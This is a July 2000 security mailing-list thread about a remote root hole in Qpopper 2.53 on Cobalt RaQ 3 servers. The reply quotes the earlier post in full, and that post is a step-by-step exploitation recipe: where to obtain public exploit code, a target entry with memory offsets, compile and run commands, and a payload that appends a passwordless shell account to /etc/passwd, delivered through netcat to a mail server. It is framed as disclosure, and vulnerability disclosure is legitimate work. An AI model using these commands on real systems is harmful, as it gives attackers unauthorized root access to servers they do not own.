Re: [cobalt-security] Qpopper - remote root...

[Gossi The Dog <gossi@xxxxxxxxxxxxxx>]

Well, its a known problem, and has been known for a while.  I only
just got around to having a look at exploiting it on my RaQ
3.  Admittedly, this post should have waited till Monday morning
when everybody was back at work.

The post stems from my bugtraq post the other week - I got quite a lot of
mail from that saying both proftpd and qpopper were not exploitable
remotely with Cobalt OS 5.0, so I'm finally getting around to checking
properly.  Qpopper definatley is :\.

Gossi.


On Sat, 22 Jul 2000, Frank Cubillos wrote:

> Why the heck would you publish that on an open list!
> Geez Louise think about the lurkers in here!! Man, am I going ballistic for
> no reason?
> Group?
> Frank
> 
> > Hi,
> > If you want to exploit a Cobalt RaQ 3, grab the Qpopper 2.53 exploit from
> > http://www.hack.co.za/daem0n/pop/pop3/7350qpop.c, add the following line
> > to the "targets[]" structure:
> >   { "Cobalt OS 5.0: qpopper-2.53", 0xBFFFD368, 0xbfffdc18 },
> > compile the exploit (gcc 7350qpop.c -o qpop-cobalt), and run it in the
> > following fashion...:
> > ./qpop-cobalt <target-id-you-made> foobar@xxxxxxxxxxx user@xxxxxxxxxxxxx
> > echo owned::500:100:cracker:/:/bin/sh >>/etc/passwd 2>&1 >/dev/null | nc
> > sendmail-server.com 25
> > (user@xxxxxxxxxxxxx to, for example, gossi@xxxxxxxxxxxxxx, and
> > sendmail-server.com to a mail server you can send through).  You'll need
> > netcat installed on the box you are testing from.
> > That'll add a remote user (owned, no password) to the cobalt.
> > The attack doesn't require an account on the system - it simply needs you
> > to know an account on the system which 'pop3' is being used to retrieve
> > the mail of - I'd imagine this is a majority of accounts on Cobalts.
> 
> 
> 
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
> 

-- 
gossi@xxxxxxxxxxxxxxx